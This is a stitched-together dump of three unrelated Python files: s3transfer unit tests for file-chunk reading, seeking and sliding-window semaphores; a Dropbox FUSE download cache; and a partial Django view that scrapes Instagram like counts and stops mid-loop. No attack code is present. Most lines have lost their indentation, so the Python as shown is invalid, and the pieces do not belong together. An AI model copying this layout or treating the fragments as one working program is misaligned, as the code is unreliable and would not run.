def test_remove_file_ignores_errors(self):
non_existent_file = os.path.join(self.tempdir, 'no-exist')
# This should not exist to start.
self.assertFalse(os.path.exists(non_existent_file))
try:
OSUtils().remove_file(non_existent_file)
except OSError as e:
self.fail('OSError should have been caught: %s' % e)
def test_remove_file_proxies_remove_file(self):
OSUtils().remove_file(self.filename)
self.assertFalse(os.path.exists(self.filename))
def test_rename_file(self):
new_filename = os.path.join(self.tempdir, 'newfoo')
OSUtils().rename_file(self.filename, new_filename)
self.assertFalse(os.path.exists(self.filename))
self.assertTrue(os.path.exists(new_filename))
def test_is_special_file_for_normal_file(self):
self.assertFalse(OSUtils().is_special_file(self.filename))
    def test_is_special_file_for_non_existent_file(self):
        non_existent_filename = os.path.join(self.tempdir, 'no-exist')
        self.assertFalse(os.path.exists(non_existent_filename))
        self.assertFalse(OSUtils().is_special_file(non_existent_filename))
def test_get_temp_filename(self):
filename = 'myfile'
self.assertIsNotNone(
re.match(
r'%s\.[0-9A-Fa-f]{8}$' % filename,
OSUtils().get_temp_filename(filename)
)
)
def test_get_temp_filename_len_255(self):
filename = 'a'*255
temp_filename = OSUtils().get_temp_filename(filename)
self.assertLessEqual(len(temp_filename), 255)
def test_get_temp_filename_len_gt_255(self):
filename = 'a'*280
temp_filename = OSUtils().get_temp_filename(filename)
self.assertLessEqual(len(temp_filename), 255)
def test_allocate(self):
truncate_size = 1
OSUtils().allocate(self.filename, truncate_size)
with open(self.filename, 'rb') as f:
self.assertEqual(len(f.read()), truncate_size)
@mock.patch('s3transfer.utils.fallocate')
def test_allocate_with_io_error(self, mock_fallocate):
mock_fallocate.side_effect = IOError()
with self.assertRaises(IOError):
OSUtils().allocate(self.filename, 1)
self.assertFalse(os.path.exists(self.filename))
@mock.patch('s3transfer.utils.fallocate')
def test_allocate_with_os_error(self, mock_fallocate):
mock_fallocate.side_effect = OSError()
with self.assertRaises(OSError):
OSUtils().allocate(self.filename, 1)
self.assertFalse(os.path.exists(self.filename))
class TestDeferredOpenFile(BaseUtilsTest):
def setUp(self):
super(TestDeferredOpenFile, self).setUp()
self.filename = os.path.join(self.tempdir, 'foo')
self.contents = b'my contents'
with open(self.filename, 'wb') as f:
f.write(self.contents)
self.deferred_open_file = DeferredOpenFile(
self.filename, open_function=self.recording_open_function)
self.open_call_args = []
def tearDown(self):
self.deferred_open_file.close()
super(TestDeferredOpenFile, self).tearDown()
def recording_open_function(self, filename, mode):
self.open_call_args.append((filename, mode))
return open(filename, mode)
def open_nonseekable(self, filename, mode):
self.open_call_args.append((filename, mode))
return NonSeekableWriter(six.BytesIO(self.content))
def test_instantiation_does_not_open_file(self):
DeferredOpenFile(
self.filename, open_function=self.recording_open_function)
self.assertEqual(len(self.open_call_args), 0)
def test_name(self):
self.assertEqual(self.deferred_open_file.name, self.filename)
def test_read(self):
content = self.deferred_open_file.read(2)
self.assertEqual(content, self.contents[0:2])
content = self.deferred_open_file.read(2)
self.assertEqual(content, self.contents[2:4])
self.assertEqual(len(self.open_call_args), 1)
def test_write(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='wb',
open_function=self.recording_open_function)
write_content = b'foo'
self.deferred_open_file.write(write_content)
self.deferred_open_file.write(write_content)
self.deferred_open_file.close()
# Both of the writes should now be in the file.
with open(self.filename, 'rb') as f:
self.assertEqual(f.read(), write_content*2)
# Open should have only been called once.
self.assertEqual(len(self.open_call_args), 1)
def test_seek(self):
self.deferred_open_file.seek(2)
content = self.deferred_open_file.read(2)
self.assertEqual(content, self.contents[2:4])
self.assertEqual(len(self.open_call_args), 1)
def test_open_does_not_seek_with_zero_start_byte(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='wb', start_byte=0,
open_function=self.open_nonseekable)
try:
# If this seeks, an UnsupportedOperation error will be raised.
self.deferred_open_file.write(b'data')
except io.UnsupportedOperation:
self.fail('DeferredOpenFile seeked upon opening')
def test_open_seeks_with_nonzero_start_byte(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='wb', start_byte=5,
open_function=self.open_nonseekable)
# Since a non-seekable file is being opened, calling Seek will raise
# an UnsupportedOperation error.
with self.assertRaises(io.UnsupportedOperation):
self.deferred_open_file.write(b'data')
def test_tell(self):
self.deferred_open_file.tell()
# tell() should not have opened the file if it has not been seeked
# or read because we know the start bytes upfront.
self.assertEqual(len(self.open_call_args), 0)
self.deferred_open_file.seek(2)
self.assertEqual(self.deferred_open_file.tell(), 2)
self.assertEqual(len(self.open_call_args), 1)
def test_open_args(self):
self.deferred_open_file = DeferredOpenFile(
self.filename, mode='ab+',
open_function=self.recording_open_function)
# Force an open
self.deferred_open_file.write(b'data')
self.assertEqual(len(self.open_call_args), 1)
self.assertEqual(self.open_call_args[0], (self.filename, 'ab+'))
def test_context_handler(self):
with self.deferred_open_file:
self.assertEqual(len(self.open_call_args), 1)
class TestReadFileChunk(BaseUtilsTest):
def test_read_entire_chunk(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=0, chunk_size=3)
self.assertEqual(chunk.read(), b'one')
self.assertEqual(chunk.read(), b'')
def test_read_with_amount_size(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=11, chunk_size=4)
self.assertEqual(chunk.read(1), b'f')
self.assertEqual(chunk.read(1), b'o')
self.assertEqual(chunk.read(1), b'u')
self.assertEqual(chunk.read(1), b'r')
self.assertEqual(chunk.read(1), b'')
def test_reset_stream_emulation(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=11, chunk_size=4)
self.assertEqual(chunk.read(), b'four')
chunk.seek(0)
self.assertEqual(chunk.read(), b'four')
def test_read_past_end_of_file(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=36, chunk_size=100000)
self.assertEqual(chunk.read(), b'ten')
self.assertEqual(chunk.read(), b'')
self.assertEqual(len(chunk), 3)
def test_tell_and_seek(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'onetwothreefourfivesixseveneightnineten')
chunk = ReadFileChunk.from_filename(
filename, start_byte=36, chunk_size=100000)
self.assertEqual(chunk.tell(), 0)
self.assertEqual(chunk.read(), b'ten')
self.assertEqual(chunk.tell(), 3)
chunk.seek(0)
self.assertEqual(chunk.tell(), 0)
chunk.seek(1, whence=1)
self.assertEqual(chunk.tell(), 1)
chunk.seek(-1, whence=1)
self.assertEqual(chunk.tell(), 0)
chunk.seek(-1, whence=2)
self.assertEqual(chunk.tell(), 2)
def test_tell_and_seek_boundaries(self):
# Test to ensure ReadFileChunk behaves the same as the
# Python standard library around seeking and reading out
# of bounds in a file object.
data = b'abcdefghij12345678klmnopqrst'
start_pos = 10
chunk_size = 8
# Create test file
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(data)
# ReadFileChunk should be a substring of only numbers
file_objects = [
ReadFileChunk.from_filename(
filename, start_byte=start_pos, chunk_size=chunk_size
)]
# Uncomment next line to validate we match Python's io.BytesIO
# file_objects.append(io.BytesIO(data[start_pos:start_pos+chunk_size]))
for obj in file_objects:
self._assert_whence_start_behavior(obj)
self._assert_whence_end_behavior(obj)
self._assert_whence_relative_behavior(obj)
self._assert_boundary_behavior(obj)
def _assert_whence_start_behavior(self, file_obj):
self.assertEqual(file_obj.tell(), 0)
file_obj.seek(1, 0)
self.assertEqual(file_obj.tell(), 1)
file_obj.seek(1)
self.assertEqual(file_obj.tell(), 1)
self.assertEqual(file_obj.read(), b'2345678')
file_obj.seek(3, 0)
self.assertEqual(file_obj.tell(), 3)
file_obj.seek(0, 0)
self.assertEqual(file_obj.tell(), 0)
def _assert_whence_relative_behavior(self, file_obj):
self.assertEqual(file_obj.tell(), 0)
file_obj.seek(2, 1)
self.assertEqual(file_obj.tell(), 2)
file_obj.seek(1, 1)
self.assertEqual(file_obj.tell(), 3)
self.assertEqual(file_obj.read(), b'45678')
file_obj.seek(20, 1)
self.assertEqual(file_obj.tell(), 28)
file_obj.seek(-30, 1)
self.assertEqual(file_obj.tell(), 0)
self.assertEqual(file_obj.read(), b'12345678')
file_obj.seek(-8, 1)
self.assertEqual(file_obj.tell(), 0)
def _assert_whence_end_behavior(self, file_obj):
self.assertEqual(file_obj.tell(), 0)
file_obj.seek(-1, 2)
self.assertEqual(file_obj.tell(), 7)
file_obj.seek(1, 2)
self.assertEqual(file_obj.tell(), 9)
file_obj.seek(3, 2)
self.assertEqual(file_obj.tell(), 11)
self.assertEqual(file_obj.read(), b'')
file_obj.seek(-15, 2)
self.assertEqual(file_obj.tell(), 0)
self.assertEqual(file_obj.read(), b'12345678')
file_obj.seek(-8, 2)
self.assertEqual(file_obj.tell(), 0)
def _assert_boundary_behavior(self, file_obj):
# Verify we're at the start
self.assertEqual(file_obj.tell(), 0)
# Verify we can't move backwards beyond start of file
file_obj.seek(-10, 1)
self.assertEqual(file_obj.tell(), 0)
# Verify we *can* move after end of file, but return nothing
file_obj.seek(10, 2)
self.assertEqual(file_obj.tell(), 18)
self.assertEqual(file_obj.read(), b'')
self.assertEqual(file_obj.read(10), b'')
# Verify we can partially rewind
file_obj.seek(-12, 1)
self.assertEqual(file_obj.tell(), 6)
self.assertEqual(file_obj.read(), b'78')
self.assertEqual(file_obj.tell(), 8)
# Verify we can rewind to start
file_obj.seek(0)
self.assertEqual(file_obj.tell(), 0)
def test_file_chunk_supports_context_manager(self):
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(b'abc')
with ReadFileChunk.from_filename(filename,
start_byte=0,
chunk_size=2) as chunk:
val = chunk.read()
self.assertEqual(val, b'ab')
def test_iter_is_always_empty(self):
# This tests the workaround for the httplib bug (see
# the source for more info).
filename = os.path.join(self.tempdir, 'foo')
open(filename, 'wb').close()
chunk = ReadFileChunk.from_filename(
filename, start_byte=0, chunk_size=10)
self.assertEqual(list(chunk), [])
def test_callback_is_invoked_on_read(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.read(1)
chunk.read(1)
chunk.read(1)
self.assertEqual(self.amounts_seen, [1, 1, 1])
def test_all_callbacks_invoked_on_read(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback, self.callback])
chunk.read(1)
chunk.read(1)
chunk.read(1)
# The list should be twice as long because there are two callbacks
# recording the amount read.
self.assertEqual(self.amounts_seen, [1, 1, 1, 1, 1, 1])
def test_callback_can_be_disabled(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.disable_callback()
# Now reading from the ReadFileChunk should not invoke
# the callback.
chunk.read()
self.assertEqual(self.amounts_seen, [])
def test_callback_will_also_be_triggered_by_seek(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.read(2)
chunk.seek(0)
chunk.read(2)
chunk.seek(1)
chunk.read(2)
self.assertEqual(self.amounts_seen, [2, -2, 2, -1, 2])
def test_callback_triggered_by_out_of_bound_seeks(self):
data = b'abcdefghij1234567890klmnopqr'
# Create test file
filename = os.path.join(self.tempdir, 'foo')
with open(filename, 'wb') as f:
f.write(data)
chunk = ReadFileChunk.from_filename(
filename, start_byte=10, chunk_size=10,
callbacks=[self.callback])
# Seek calls that generate "0" progress are skipped by
# invoke_progress_callbacks and won't appear in the list.
expected_callback_prog = [10, -5, 5, -1, 1, -1, 1, -5, 5, -10]
self._assert_out_of_bound_start_seek(chunk, expected_callback_prog)
self._assert_out_of_bound_relative_seek(chunk, expected_callback_prog)
self._assert_out_of_bound_end_seek(chunk, expected_callback_prog)
def _assert_out_of_bound_start_seek(self, chunk, expected):
# clear amounts_seen
self.amounts_seen = []
self.assertEqual(self.amounts_seen, [])
# (position, change)
chunk.seek(20) # (20, 10)
chunk.seek(5) # (5, -5)
chunk.seek(20) # (20, 5)
chunk.seek(9) # (9, -1)
chunk.seek(20) # (20, 1)
chunk.seek(11) # (11, 0)
chunk.seek(20) # (20, 0)
chunk.seek(9) # (9, -1)
chunk.seek(20) # (20, 1)
chunk.seek(5) # (5, -5)
chunk.seek(20) # (20, 5)
chunk.seek(0) # (0, -10)
chunk.seek(0) # (0, 0)
self.assertEqual(self.amounts_seen, expected)
def _assert_out_of_bound_relative_seek(self, chunk, expected):
# clear amounts_seen
self.amounts_seen = []
self.assertEqual(self.amounts_seen, [])
# (position, change)
chunk.seek(20, 1) # (20, 10)
chunk.seek(-15, 1) # (5, -5)
chunk.seek(15, 1) # (20, 5)
chunk.seek(-11, 1) # (9, -1)
chunk.seek(11, 1) # (20, 1)
chunk.seek(-9, 1) # (11, 0)
chunk.seek(9, 1) # (20, 0)
chunk.seek(-11, 1) # (9, -1)
chunk.seek(11, 1) # (20, 1)
chunk.seek(-15, 1) # (5, -5)
chunk.seek(15, 1) # (20, 5)
chunk.seek(-20, 1) # (0, -10)
chunk.seek(-1000, 1) # (0, 0)
self.assertEqual(self.amounts_seen, expected)
def _assert_out_of_bound_end_seek(self, chunk, expected):
# clear amounts_seen
self.amounts_seen = []
self.assertEqual(self.amounts_seen, [])
# (position, change)
chunk.seek(10, 2) # (20, 10)
chunk.seek(-5, 2) # (5, -5)
chunk.seek(10, 2) # (20, 5)
chunk.seek(-1, 2) # (9, -1)
chunk.seek(10, 2) # (20, 1)
chunk.seek(1, 2) # (11, 0)
chunk.seek(10, 2) # (20, 0)
chunk.seek(-1, 2) # (9, -1)
chunk.seek(10, 2) # (20, 1)
chunk.seek(-5, 2) # (5, -5)
chunk.seek(10, 2) # (20, 5)
chunk.seek(-10, 2) # (0, -10)
chunk.seek(-1000, 2) # (0, 0)
self.assertEqual(self.amounts_seen, expected)
def test_close_callbacks(self):
with open(self.filename) as f:
chunk = ReadFileChunk(f, chunk_size=1, full_file_size=3,
close_callbacks=[self.close_callback])
chunk.close()
self.assertEqual(self.num_close_callback_calls, 1)
def test_close_callbacks_when_not_enabled(self):
with open(self.filename) as f:
chunk = ReadFileChunk(f, chunk_size=1, full_file_size=3,
enable_callbacks=False,
close_callbacks=[self.close_callback])
chunk.close()
self.assertEqual(self.num_close_callback_calls, 0)
def test_close_callbacks_when_context_handler_is_used(self):
with open(self.filename) as f:
with ReadFileChunk(f, chunk_size=1, full_file_size=3,
close_callbacks=[self.close_callback]) as chunk:
chunk.read(1)
self.assertEqual(self.num_close_callback_calls, 1)
def test_signal_transferring(self):
chunk = ReadFileChunk.from_filename(
self.filename, start_byte=0, chunk_size=3,
callbacks=[self.callback])
chunk.signal_not_transferring()
chunk.read(1)
self.assertEqual(self.amounts_seen, [])
chunk.signal_transferring()
chunk.read(1)
self.assertEqual(self.amounts_seen, [1])
def test_signal_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock()
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
chunk.signal_transferring()
self.assertTrue(underlying_stream.signal_transferring.called)
def test_no_call_signal_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock(io.RawIOBase)
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
try:
chunk.signal_transferring()
except AttributeError:
self.fail(
'The stream should not have tried to call signal_transferring '
'to the underlying stream.'
)
def test_signal_not_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock()
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
chunk.signal_not_transferring()
self.assertTrue(underlying_stream.signal_not_transferring.called)
def test_no_call_signal_not_transferring_to_underlying_fileobj(self):
underlying_stream = mock.Mock(io.RawIOBase)
underlying_stream.tell.return_value = 0
chunk = ReadFileChunk(underlying_stream, 3, 3)
try:
chunk.signal_not_transferring()
except AttributeError:
self.fail(
'The stream should not have tried to call '
'signal_not_transferring to the underlying stream.'
)
class TestStreamReaderProgress(BaseUtilsTest):
def test_proxies_to_wrapped_stream(self):
original_stream = six.StringIO('foobarbaz')
wrapped = StreamReaderProgress(original_stream)
self.assertEqual(wrapped.read(), 'foobarbaz')
def test_callback_invoked(self):
original_stream = six.StringIO('foobarbaz')
wrapped = StreamReaderProgress(
original_stream, [self.callback, self.callback])
self.assertEqual(wrapped.read(), 'foobarbaz')
self.assertEqual(self.amounts_seen, [9, 9])
class TestTaskSemaphore(unittest.TestCase):
def setUp(self):
self.semaphore = TaskSemaphore(1)
def test_should_block_at_max_capacity(self):
self.semaphore.acquire('a', blocking=False)
with self.assertRaises(NoResourcesAvailable):
self.semaphore.acquire('a', blocking=False)
def test_release_capacity(self):
acquire_token = self.semaphore.acquire('a', blocking=False)
self.semaphore.release('a', acquire_token)
try:
self.semaphore.acquire('a', blocking=False)
except NoResourcesAvailable:
self.fail(
'The release of the semaphore should have allowed for '
'the second acquire to not be blocked'
)
class TestSlidingWindowSemaphore(unittest.TestCase):
    # These tests use block=False so the tests will fail
    # instead of hanging the test runner in the case of
    # incorrect behavior.
def test_acquire_release_basic_case(self):
sem = SlidingWindowSemaphore(1)
# Count is 1
num = sem.acquire('a', blocking=False)
self.assertEqual(num, 0)
sem.release('a', 0)
# Count now back to 1.
def test_can_acquire_release_multiple_times(self):
sem = SlidingWindowSemaphore(1)
num = sem.acquire('a', blocking=False)
self.assertEqual(num, 0)
sem.release('a', num)
num = sem.acquire('a', blocking=False)
self.assertEqual(num, 1)
sem.release('a', num)
def test_can_acquire_a_range(self):
sem = SlidingWindowSemaphore(3)
self.assertEqual(sem.acquire('a', blocking=False), 0)
self.assertEqual(sem.acquire('a', blocking=False), 1)
self.assertEqual(sem.acquire('a', blocking=False), 2)
sem.release('a', 0)
sem.release('a', 1)
sem.release('a', 2)
# Now we're reset so we should be able to acquire the same
# sequence again.
self.assertEqual(sem.acquire('a', blocking=False), 3)
self.assertEqual(sem.acquire('a', blocking=False), 4)
self.assertEqual(sem.acquire('a', blocking=False), 5)
self.assertEqual(sem.current_count(), 0)
def test_counter_release_only_on_min_element(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
# The count only increases when we free the min
# element. This means if we're currently failing to
# acquire now:
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
# Then freeing a non-min element:
sem.release('a', 1)
# doesn't change anything. We still fail to acquire.
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
self.assertEqual(sem.current_count(), 0)
def test_raises_error_when_count_is_zero(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
# Count is now 0 so trying to acquire should fail.
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
def test_release_counters_can_increment_counter_repeatedly(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
# These two releases don't increment the counter
# because we're waiting on 0.
sem.release('a', 1)
sem.release('a', 2)
self.assertEqual(sem.current_count(), 0)
# But as soon as we release 0, we free up 0, 1, and 2.
sem.release('a', 0)
self.assertEqual(sem.current_count(), 3)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
def test_error_to_release_unknown_tag(self):
sem = SlidingWindowSemaphore(3)
with self.assertRaises(ValueError):
sem.release('a', 0)
def test_can_track_multiple_tags(self):
sem = SlidingWindowSemaphore(3)
self.assertEqual(sem.acquire('a', blocking=False), 0)
self.assertEqual(sem.acquire('b', blocking=False), 0)
self.assertEqual(sem.acquire('a', blocking=False), 1)
# We're at our max of 3 even though 2 are for A and 1 is for B.
with self.assertRaises(NoResourcesAvailable):
sem.acquire('a', blocking=False)
with self.assertRaises(NoResourcesAvailable):
sem.acquire('b', blocking=False)
def test_can_handle_multiple_tags_released(self):
sem = SlidingWindowSemaphore(4)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('b', blocking=False)
sem.acquire('b', blocking=False)
sem.release('b', 1)
sem.release('a', 1)
self.assertEqual(sem.current_count(), 0)
sem.release('b', 0)
self.assertEqual(sem.acquire('a', blocking=False), 2)
sem.release('a', 0)
self.assertEqual(sem.acquire('b', blocking=False), 2)
def test_is_error_to_release_unknown_sequence_number(self):
sem = SlidingWindowSemaphore(3)
sem.acquire('a', blocking=False)
with self.assertRaises(ValueError):
sem.release('a', 1)
def test_is_error_to_double_release(self):
# This is different than other error tests because
# we're verifying we can reset the state after an
# acquire/release cycle.
sem = SlidingWindowSemaphore(2)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.release('a', 0)
sem.release('a', 1)
self.assertEqual(sem.current_count(), 2)
with self.assertRaises(ValueError):
sem.release('a', 0)
def test_can_check_in_partial_range(self):
sem = SlidingWindowSemaphore(4)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
sem.release('a', 1)
sem.release('a', 3)
sem.release('a', 0)
self.assertEqual(sem.current_count(), 2)
class TestThreadingPropertiesForSlidingWindowSemaphore(unittest.TestCase):
    # These tests focus on multithreaded properties of the range
# semaphore. Basic functionality is tested in TestSlidingWindowSemaphore.
def setUp(self):
self.threads = []
def tearDown(self):
self.join_threads()
def join_threads(self):
for thread in self.threads:
thread.join()
self.threads = []
def start_threads(self):
for thread in self.threads:
thread.start()
def test_acquire_blocks_until_release_is_called(self):
sem = SlidingWindowSemaphore(2)
sem.acquire('a', blocking=False)
sem.acquire('a', blocking=False)
def acquire():
# This next call to acquire will block.
self.assertEqual(sem.acquire('a', blocking=True), 2)
t = threading.Thread(target=acquire)
self.threads.append(t)
# Starting the thread will block the sem.acquire()
# in the acquire function above.
t.start()
# This still will keep the thread blocked.
sem.release('a', 1)
# Releasing the min element will unblock the thread.
sem.release('a', 0)
t.join()
sem.release('a', 2)
def test_stress_invariants_random_order(self):
sem = SlidingWindowSemaphore(100)
for _ in range(10):
recorded = []
for _ in range(100):
recorded.append(sem.acquire('a', blocking=False))
# Release them in randomized order. As long as we
# eventually free all 100, we should have all the
# resources released.
random.shuffle(recorded)
for i in recorded:
sem.release('a', i)
# Everything's freed so should be back at count == 100
self.assertEqual(sem.current_count(), 100)
def test_blocking_stress(self):
sem = SlidingWindowSemaphore(5)
num_threads = 10
num_iterations = 50
def acquire():
for _ in range(num_iterations):
num = sem.acquire('a', blocking=True)
time.sleep(0.001)
sem.release('a', num)
for i in range(num_threads):
t = threading.Thread(target=acquire)
self.threads.append(t)
self.start_threads()
self.join_threads()
# Should have all the available resources freed.
self.assertEqual(sem.current_count(), 5)
# Should have acquired num_threads * num_iterations
self.assertEqual(sem.acquire('a', blocking=False),
num_threads * num_iterations)
class TestAdjustChunksize(unittest.TestCase):
def setUp(self):
self.adjuster = ChunksizeAdjuster()
def test_valid_chunksize(self):
chunksize = 7 * (1024 ** 2)
file_size = 8 * (1024 ** 2)
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, chunksize)
def test_chunksize_below_minimum(self):
chunksize = MIN_UPLOAD_CHUNKSIZE - 1
file_size = 3 * MIN_UPLOAD_CHUNKSIZE
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, MIN_UPLOAD_CHUNKSIZE)
def test_chunksize_above_maximum(self):
chunksize = MAX_SINGLE_UPLOAD_SIZE + 1
file_size = MAX_SINGLE_UPLOAD_SIZE * 2
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, MAX_SINGLE_UPLOAD_SIZE)
def test_chunksize_too_small(self):
chunksize = 7 * (1024 ** 2)
file_size = 5 * (1024 ** 4)
# If we try to upload a 5TB file, we'll need to use 896MB part
# sizes.
new_size = self.adjuster.adjust_chunksize(chunksize, file_size)
self.assertEqual(new_size, 896 * (1024 ** 2))
num_parts = file_size / new_size
self.assertLessEqual(num_parts, MAX_PARTS)
def test_unknown_file_size_with_valid_chunksize(self):
chunksize = 7 * (1024 ** 2)
new_size = self.adjuster.adjust_chunksize(chunksize)
self.assertEqual(new_size, chunksize)
def test_unknown_file_size_below_minimum(self):
chunksize = MIN_UPLOAD_CHUNKSIZE - 1
new_size = self.adjuster.adjust_chunksize(chunksize)
self.assertEqual(new_size, MIN_UPLOAD_CHUNKSIZE)
def test_unknown_file_size_above_maximum(self):
chunksize = MAX_SINGLE_UPLOAD_SIZE + 1
new_size = self.adjuster.adjust_chunksize(chunksize)
self.assertEqual(new_size, MAX_SINGLE_UPLOAD_SIZE)
|
cache.py
|
import contextlib
import logging
import errno
from typing import List
from enum import Enum
from pathlib import Path
from threading import Thread, Event
from fuse import FuseOSError
from requests.exceptions import ReadTimeout
from dropbox import Dropbox
from dropbox_fs.crawler import File
log = logging.getLogger(__name__)
class SizeWatcher(Event):
def __init__(self, size):
super().__init__()
self.size = size
class FileDownloader:
class State(Enum):
working = 0
success = 1
failure = 2
def __init__(self, path: str, file: Path, dbx: Dropbox, db_path: str, finished_callback):
self.path, self.file, self.dbx, self.db_path = path, file, dbx, db_path
self.state = self.State.working
self.finished_callback = finished_callback
self.size_watcher: List[SizeWatcher] = []
file.parent.mkdir(parents=True, exist_ok=True)
self.f = open(str(file), 'wb')
self.bytes_downloaded = 0
Thread(target=self.download).start()
def download(self):
log.debug('downloading {}'.format(self.db_path))
with contextlib.closing(self):
with contextlib.closing(self.f):
try:
md, res = self.dbx.files_download(self.db_path)
with contextlib.closing(res):
for c in res.iter_content(2 ** 16):
self.f.write(c)
self.bytes_downloaded += len(c)
[w.set() for w in self.size_watcher if self.bytes_downloaded > w.size]
except (ConnectionError, ReadTimeout):
log.error('downloading failed for {}'.format(self.db_path))
self.state = self.State.failure
[w.set() for w in self.size_watcher]
return
self.state = self.State.success
log.debug('download finished: {}'.format(self.db_path))
[w.set() for w in self.size_watcher]
def close(self):
self.finished_callback(self)
def wait_for_size(self, size) -> bool:
log.debug('waiting for size {}: {}'.format(size, self.db_path))
if self.state == self.State.working and self.bytes_downloaded < size:
log.debug('new size watcher for {}'.format(self.db_path))
watcher = SizeWatcher(size)
self.size_watcher.append(watcher)
while self.bytes_downloaded < size and self.state == self.State.working:
watcher.wait(2)
self.size_watcher.remove(watcher)
if self.state == self.State.failure:
return False
if not self.f.closed:
log.debug('flush {}'.format(self.db_path))
self.f.flush()
return True
class FileCache:
def __init__(self, base_path: Path, dbx: Dropbox):
self.base_path = base_path
self.dbx = dbx
self.downloading = {}
self.files_opened = {}
def open(self, path: str, rel_path: str, db_file: File, db_path: str, flags: int) -> int:
file = self.base_path / rel_path
if file.exists():
if db_path in self.downloading:
return self.open_file(file, flags)
return self.open_file(file, flags)
# downloading ..?
# newer ..?
else:
self.downloading[path] = FileDownloader(path, file, self.dbx, db_path, self.finished_downloading)
return self.open_file(file, flags)
def read(self, path, size, offset, fh):
try:
f = self.files_opened[fh]
except KeyError:
log.error('no open file found while reading from {}'.format(path))
raise FuseOSError(errno.EIO)
if path in self.downloading:
if not self.downloading[path].wait_for_size(offset+size):
raise FuseOSError(errno.EIO)
# else:
# log.debug('{} not in {}'.format(path, list(self.downloading.keys())))
f.seek(offset)
return f.read(size)
def close(self, fh):
try:
self.files_opened.pop(fh).close()
except KeyError:
log.error('no open file found while closing file handle {}'.format(fh))
def finished_downloading(self, downloader: FileDownloader):
log.debug('removing {} from downloading'.format(downloader.db_path))
del self.downloading[downloader.path]
def open_file(self, file, _flags) -> int:
f = open(file, 'rb')
self.files_opened[f.fileno()] = f
return f.fileno()
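# A minimal usage sketch (illustrative only; 'dbx', 'crawled_file' and the
# paths are hypothetical, and in practice a FUSE Operations class drives these
# calls):
#
#   cache = FileCache(Path('/tmp/dropbox-cache'), dbx)
#   fh = cache.open('/docs/report.pdf', 'docs/report.pdf', crawled_file,
#                   '/docs/report.pdf', flags=0)
#   data = cache.read('/docs/report.pdf', 4096, 0, fh)  # blocks via wait_for_size
#   cache.close(fh)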
|
views.py
|
from django.shortcuts import render
from django.db import transaction
from django.http import JsonResponse
from django.core.serializers.json import DjangoJSONEncoder
from django.db.models.fields.files import ImageFieldFile
from .models import Gallery
import requests
import threading
import random
import json
class ExtendedEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, ImageFieldFile):
return str(o)
else:
return super().default(o)
def GalleryJSON(req):
entries = (list(Gallery.objects.exclude(entry_id="0").order_by('-likes')))
gallery = []
for index, val in enumerate(entries):
gallery.append({
"standing": index,
"profile": val.profile_pic.url,
"thumbnail": val.thumbnail.url,
"insta_id": val.insta_id,
"post": val.post,
"entry_id": val.entry_id,
"caption": val.caption,
"likes": val.likes,
"submission": val.submission
})
random.shuffle(gallery)
return JsonResponse({'gallery': gallery}, encoder=ExtendedEncoder)
# Create your views here.
def EntryPageView(req):
return render(req, 'gallery/entry.html')
def updateTheDB():
cursor = ""
entries = {}
while True:
n = 0
data = requests.get(
'https://www.instagram.com/graphql/query/?query_id=17888483320059182&id=39236369448&first=50&after='
+ cursor)
data = data.json()
for detail in data['data']['user']['edge_owner_to_timeline_media'][
'edges']:
detail = detail['node']
try:
caption = detail['edge_media_to_caption']['edges'][0]['node'][
'text'][:10]
            except (IndexError, KeyError):
caption = ""
likes = detail['edge_media_preview_like']['count']
entries[caption] = likes
